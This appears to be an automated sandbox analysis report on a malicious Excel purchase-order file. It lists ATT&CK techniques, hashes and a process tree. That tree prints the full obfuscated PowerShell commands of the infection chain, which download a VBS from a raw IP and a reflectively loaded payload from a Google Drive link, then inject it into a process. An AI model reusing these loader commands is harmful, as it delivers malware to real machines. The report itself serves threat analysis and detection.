a3fddc5f8fdb4f125ad3604d28d603947a6ccf1dacbc1fbb910d3c773f70dcbe

Analysis

max time kernel
121s
max time network
127s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
31/10/2024, 09:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Orden de compra.xla.xls
Size

657KB
MD5

1048471113b938176f93411516da0960
SHA1

42711353d0c65d1d7e7b16fceb81d6d23a08d286
SHA256

a3fddc5f8fdb4f125ad3604d28d603947a6ccf1dacbc1fbb910d3c773f70dcbe
SHA512

d2ecacfe828afaf1c41a5f08f9292dfa92f51bb85a47fbb4a9d0a87572c9f48001d352032a4c33c3b7919895ab9db674a1af3f210b36eda6848f86eda9f3a582
SSDEEP

12288:/7dWr5iDaBPSGJ6E30oXeu9rjjYdLXGnJ8eS//9BfXBg8u:cAaBSGDbXeL6S//zfB

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 7 IoCs

flow	pid	Process
10	2816	mshta.exe
11	2816	mshta.exe
13	1240	powERshELL.eXE
15	2256	WScript.exe
16	2256	WScript.exe
18	904	powershell.exe
22	904	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2004	powershell.exe
904	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1240	powERshELL.eXE
1784	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
17	drive.google.com
18	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powERshELL.eXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powERshELL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3056	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1240	powERshELL.eXE
1784	powershell.exe
1240	powERshELL.eXE
1240	powERshELL.eXE
2004	powershell.exe
904	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1240	powERshELL.eXE
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	904	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3056	EXCEL.EXE
3056	EXCEL.EXE
3056	EXCEL.EXE
3056	EXCEL.EXE
3056	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2816 wrote to memory of 1240	2816	mshta.exe	33
PID 2816 wrote to memory of 1240	2816	mshta.exe	33
PID 2816 wrote to memory of 1240	2816	mshta.exe	33
PID 2816 wrote to memory of 1240	2816	mshta.exe	33
PID 1240 wrote to memory of 1784	1240	powERshELL.eXE	35
PID 1240 wrote to memory of 1784	1240	powERshELL.eXE	35
PID 1240 wrote to memory of 1784	1240	powERshELL.eXE	35
PID 1240 wrote to memory of 1784	1240	powERshELL.eXE	35
PID 1240 wrote to memory of 436	1240	powERshELL.eXE	36
PID 1240 wrote to memory of 436	1240	powERshELL.eXE	36
PID 1240 wrote to memory of 436	1240	powERshELL.eXE	36
PID 1240 wrote to memory of 436	1240	powERshELL.eXE	36
PID 436 wrote to memory of 780	436	csc.exe	37
PID 436 wrote to memory of 780	436	csc.exe	37
PID 436 wrote to memory of 780	436	csc.exe	37
PID 436 wrote to memory of 780	436	csc.exe	37
PID 1240 wrote to memory of 2256	1240	powERshELL.eXE	39
PID 1240 wrote to memory of 2256	1240	powERshELL.eXE	39
PID 1240 wrote to memory of 2256	1240	powERshELL.eXE	39
PID 1240 wrote to memory of 2256	1240	powERshELL.eXE	39
PID 2256 wrote to memory of 2004	2256	WScript.exe	40
PID 2256 wrote to memory of 2004	2256	WScript.exe	40
PID 2256 wrote to memory of 2004	2256	WScript.exe	40
PID 2256 wrote to memory of 2004	2256	WScript.exe	40
PID 2004 wrote to memory of 904	2004	powershell.exe	42
PID 2004 wrote to memory of 904	2004	powershell.exe	42
PID 2004 wrote to memory of 904	2004	powershell.exe	42
PID 2004 wrote to memory of 904	2004	powershell.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Orden de compra.xla.xls"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3056

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Windows\SysWOW64\wIndOWspOweRsHElL\v1.0\powERshELL.eXE
  "C:\Windows\sYstEM32\wIndOWspOweRsHElL\v1.0\powERshELL.eXE" "pOwerShELL -EX bYpaSS -NOp -W 1 -C DEViCeCREDENTiAlDePloYMENT.ExE ; IeX($(IeX('[SYSteM.TEXT.encodING]'+[CHAR]58+[cHar]58+'uTF8.GeTStrINg([SYsTEm.ConVERT]'+[CHAR]0x3a+[cHaR]58+'frOMbasE64STriNg('+[chaR]34+'JHlLdEl4amsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVmaW5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0RyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxZEtVLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdFQURoRXFaSyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd1JPVnRsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhTcyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktwY3ZWayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0JvcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeUt0SXhqazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1LjE0OS4yNDEuMTgzL01QRFctY29uc3RyYWludHMudmJzIiwiJGVOVjpBUFBEQVRBXG5lZXRhbmRjbGVhbnRoaW5nc2Zvcmdvb2QudmJzIiwwLDApO1N0QXJ0LXNsRUVQKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxuZWV0YW5kY2xlYW50aGluZ3Nmb3Jnb29kLnZicyI='+[ChAR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1240
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpaSS -NOp -W 1 -C DEViCeCREDENTiAlDePloYMENT.ExE
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1784
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\atav4f2k.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D3E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5D3D.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:780
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\neetandcleanthingsforgood.vbs"
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2256
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdmRUdpbWFnZScrJ1VybCA9IGVJR2h0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIGVJRztmRUd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2ZFR2ltYWdlQnl0ZXMgPSBmRUd3ZWJDbGllbnQuRG93bmxvYWREYXRhKGZFR2ltYWdlVXJsJysnKTtmRUdpbWEnKydnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhmRUdpbWFnZUJ5dGVzKTtmRUdzdGFydEZsYWcgPSBlSUc8JysnPEJBU0U2NF9TVEFSVD4+ZUlHO2ZFR2VuZEZsYWcgPSBlSUc8JysnPEJBU0U2NF9FTkQ+PmVJRztmRUdzdGFydEluZGV4ID0gZkVHaW1hZ2VUJysnZXh0LkluZGV4T2YoZkVHc3RhcnRGbGFnKTtmRUdlbmRJbmRleCA9IGZFR2ltYWdlVGV4dC5JbmRleCcrJ09mKGZFR2VuZEZsYWcnKycpO2ZFR3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBmRUdlbmRJbmRleCAtZ3QgZkVHc3RhcnRJbmRleCcrJztmRUdzdGFydEluZGV4ICs9IGZFR3N0YXJ0RmxhZy5MZW5ndGg7ZkVHYmFzZTY0TGVuZ3RoID0gZkVHZW5kSW5kZXggLSBmRUdzdGFydEluZGV4O2ZFR2JhcycrJ2U2NENvbW1hbmQgPSBmRUdpbWFnZVRleHQuU3Vic3RyaW5nKGZFR3N0YXJ0SW5kZXgsIGZFR2Jhc2U2NExlbmd0aCk7ZkVHYicrJ2FzZTY0UmV2ZXJzZWQgPSAtam9pbiAoZkVHYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIEhldyBGJysnb3JFYWNoLU9iamVjdCB7IGZFR18nKycgfSlbLTEuLi0oZkVHYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtmRUcnKydjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGJysncm9tQmFzZTY0U3RyaW5nKGZFR2Jhc2U2NFJldmVyc2VkKTtmRUdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoZkVHY29tbWFuZEJ5dGVzKTtmRUd2YWlNZXRob2QgPSBbZG5saWIuSU8uJysnSG9tZV0uR2V0TWV0aG9kKGVJR1ZBSWVJRycrJyk7ZkVHdmFpTWV0aG9kLkludicrJ29rZShmRUdudWxsLCBAKGVJR3R4dC5kJysndWR1ZHVkdWR1RC8zODEuMTQyLjk0MS41NC8vOnB0dGhlSUcsIGVJR2QnKydlc2F0aXZhZG9lSUcsJysnIGVJR2Rlc2F0aXZhZG9lSUcsIGVJR2Rlc2F0aXZhZG9lSUcsIGVJR0FkZEluUHJvY2VzczMyZUlHLCBlSScrJ0dkZXNhdGl2YWRvZUlHLCBlSUdkZXNhdGl2YWRvZUlHLGVJR2RlJysnc2F0aXZhZG9lSUcsZUlHZGVzYXRpdmFkb2VJRyxlSUdkZXNhdGl2YWRvZUlHLGVJR2Rlc2F0aXZhZG9lSUcsZUlHZGVzYXRpdmFkb2VJRyxlSUcxZUlHLGVJR2Rlc2F0aXZhZG9lSUcpKTsnKS5SZVBMQUNlKChbQ2hhcl0xMDErW0NoYXJdNzMrW0NoYXJdNzEpLFtTVFJpTmddW0NoYXJdMzkpLlJlUExBQ2UoJ2ZFRycsW1NUUmlOZ11bQ2hhcl0zNikuUmVQTEFDZSgoW0NoYXJdNzIrW0NoYXJdMTAxK1tDaGFyXTExOSksW1NUUmlOZ11bQ2hhcl0xMjQpIHwuKCAkRW52OkNvTXNwRWNbNCwyNiwyNV0tSk9JTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2004
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('fEGimage'+'Url = eIGhttps:/'+'/drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur eIG;fEGwebClient = New-Object System.Net.WebClient;fEGimageBytes = fEGwebClient.DownloadData(fEGimageUrl'+');fEGima'+'geText = [System.Text.Encoding]::UTF8.GetString(fEGimageBytes);fEGstartFlag = eIG<'+'<BASE64_START>>eIG;fEGendFlag = eIG<'+'<BASE64_END>>eIG;fEGstartIndex = fEGimageT'+'ext.IndexOf(fEGstartFlag);fEGendIndex = fEGimageText.Index'+'Of(fEGendFlag'+');fEGstartIndex -ge 0 -and fEGendIndex -gt fEGstartIndex'+';fEGstartIndex += fEGstartFlag.Length;fEGbase64Length = fEGendIndex - fEGstartIndex;fEGbas'+'e64Command = fEGimageText.Substring(fEGstartIndex, fEGbase64Length);fEGb'+'ase64Reversed = -join (fEGbase64Command.ToCharArray() Hew F'+'orEach-Object { fEG_'+' })[-1..-(fEGbase64Command.Length)];fEG'+'commandBytes = [System.Convert]::F'+'romBase64String(fEGbase64Reversed);fEGloadedAssembly = [System.Reflection.Assembly]'+'::Load(fEGcommandBytes);fEGvaiMethod = [dnlib.IO.'+'Home].GetMethod(eIGVAIeIG'+');fEGvaiMethod.Inv'+'oke(fEGnull, @(eIGtxt.d'+'ududududuD/381.142.941.54//:pttheIG, eIGd'+'esativadoeIG,'+' eIGdesativadoeIG, eIGdesativadoeIG, eIGAddInProcess32eIG, eI'+'GdesativadoeIG, eIGdesativadoeIG,eIGde'+'sativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIG1eIG,eIGdesativadoeIG));').RePLACe(([Char]101+[Char]73+[Char]71),[STRiNg][Char]39).RePLACe('fEG',[STRiNg][Char]36).RePLACe(([Char]72+[Char]101+[Char]119),[STRiNg][Char]124) |.( $Env:CoMspEc[4,26,25]-JOIN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
3aafe16555374466063ace2aa215363a

SHA1
55f5a19d521cf53be72a3e2efdcd20d350e6f423

SHA256
a8290ba202c19258d8b1fd1145f5784eafa9d8f10e52b486ce07dd4cf04c5d82

SHA512
694083d90f5038ad3e735d0850c7a6599017eece029c2b6bbb58197de4443d7da18e1580cfba82cfe3512bbae1b953954898c28a15d6cc63251d1b1a9251b488

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
853861f29947f5049783730ad78d99dc

SHA1
7210ffb60673ba72ced116a93aab750f2e05e6dc

SHA256
8fa3c7f7396623c4ee56e2113fc1d29ba71a7c640fdb5b7b9be948ae00b63e2f

SHA512
f457ebc9fe15c1e77400575c20b187015ee531886667e3993b7676392473082a53301db36227ad153605949e4a848b4d16671ab9166e56e78aeadd5126983d93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\greenthingswithgreatnewsforgetmeback[1].hta

Filesize
8KB

MD5
c6eae4c9efe3cc3cb25b6d3783dff994

SHA1
28fd5a701814a8181b09d4501dcb61a3c83baede

SHA256
e2246e47bcd3044b98eba30b9d121115db0d42d2df7a56aea9e547685f7a91a3

SHA512
ef63af7f1ef567585c028c9c8492fd845355cc2240cff082c67b92372f1b7e69cd86c7be0656925b8a17912bea41f8f881528fec489d4065969e5f41cc889ee9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4579.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5D3E.tmp

Filesize
1KB

MD5
a325c042b2f62048a126289c76f327e0

SHA1
c9e07c31b88b7ebadf10610ceaae82f216ec3802

SHA256
45a38413b25cde453e233e2eda3e0ea51ce7d80c0b4c41d39a2aed09b5562ac5

SHA512
e32b254d7cf6602dc7400817670e4f3874564e86f4f4c2d62ef867cfa640cdbda1711dad955b889fcbc708a69c5870bd47069ee814e9f0eca2bf78e0524f8f22

Download Submit
C:\Users\Admin\AppData\Local\Temp\atav4f2k.dll

Filesize
3KB

MD5
4b4d7be430711f640866d3d9796e6c59

SHA1
9d6d2b24e59289270fe1ac3c5ba243c8f0b3907e

SHA256
856068bd301034943fd5366608ae06de26029883eb9cf5bf7b039b1f8bf918d9

SHA512
3471e0bf87f9b732676823f3caad180957bb7151cb3ccc45deeb4c8150cc14c47fa61fe5fd660094517f710b765f66abeccb182635642ec80d46ad83e5c7b653

Download Submit
C:\Users\Admin\AppData\Local\Temp\atav4f2k.pdb

Filesize
7KB

MD5
d50259b1de03cdd9d92b5ad371cac1a2

SHA1
b2b1ba4b3da674fedddc411b41c7d5b81de3360e

SHA256
b1812495404a15f44fe3b604a960d144861ef56fa71cf6edf983e290a0978996

SHA512
3c0d2ef5d49706428a3cf13bf45e8b53deffb51d3bc9e06b08a68b30b6a193bbf716f5ee34214fc8892d2f5b8447a72a4ebac743e55528c68be3edd1b6ae6d48

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
7050c3a50c0accf269a4d9ef9c390da7

SHA1
caf319daad68db4029f504c1ab855c67c4aa5f8a

SHA256
3cc4bff1687d234ad4b275bae58a04466cdf8dc7c7cd74e2337433e605171c09

SHA512
e49cf8bf86f0b3b83d299f9780b6fcdf2cce48df3af117aa581563e47fbf2e36c683cb5ea0995104de2da3269a38b22ee278061c75d3591ec91abd2b06ec6229

Download Submit
C:\Users\Admin\AppData\Roaming\neetandcleanthingsforgood.vbs

Filesize
68KB

MD5
d27816d0f221aaf7a0362700a3e0a5b4

SHA1
390961053e0642b3715262962533550675dbd9b5

SHA256
9a81502d5d1efb62ca49e778c4e117b4784ead30b3565e80bdf5139d9ecd7162

SHA512
29e68d3d817699d950f6165e199eaa83cb14f9b0238e53d580ee78b2bf2c883370faf389e24b1fae8aded4758d7399a94ead882ad30398ce8cf9fa564796f76e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC5D3D.tmp

Filesize
652B

MD5
02c102a5dc8be5c7498267c89eb58152

SHA1
3db15792e3e6d4583e62be0b581e11e3f419ba2a

SHA256
f851c56fcbf9be9adb16d1e048ebd6f966fc80ced846722528c26242caf3d49f

SHA512
669643357ba11964e1bdcb07a48bfcc6175a003f407eeb5e4aff3025d3d332f302f92c94b1fbbdfed6a8e79af13421b2a4878e7dab362988e1916babb3123819

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\atav4f2k.0.cs

Filesize
467B

MD5
d12717d89552ddb8b59a93f6d7b53650

SHA1
8141049952e7f42cd8ff2931934515a6b3901135

SHA256
90f46741701b8bb295ffb92a94a70d5233d2ec0f4a58941f7c1fa4a8d6a0276c

SHA512
42056b6146e8543dd33cc5645c6527264bfb30cc159259dae2beb03fed25aa719d257ad0e4b96ba0a02f59655ccda5bb4865623e093ad3e7dd621bd3d463a19f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\atav4f2k.cmdline

Filesize
309B

MD5
58139ee86e1ce46d222d80681287283f

SHA1
9bc2635ecb5b044c0710c6aaee5d90ac9cc475e2

SHA256
96927c0c1171d6ee2f6b82d87629151722059bab8ecc799be45010222599698f

SHA512
1a045ae0e32920ae04d73335fb81d6a39c9a36115e1cf0d21031b4391479f8f294bfeed14d27142297d0db2881e84003eb2a0c84df58ef268c34e7e210c470a2

Download Submit
memory/2816-17-0x0000000002640000-0x0000000002642000-memory.dmp

Filesize
8KB

Download
memory/3056-18-0x0000000002470000-0x0000000002472000-memory.dmp

Filesize
8KB

Download
memory/3056-1-0x00000000729CD000-0x00000000729D8000-memory.dmp

Filesize
44KB

Download
memory/3056-32-0x00000000729CD000-0x00000000729D8000-memory.dmp

Filesize
44KB

Download
memory/3056-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download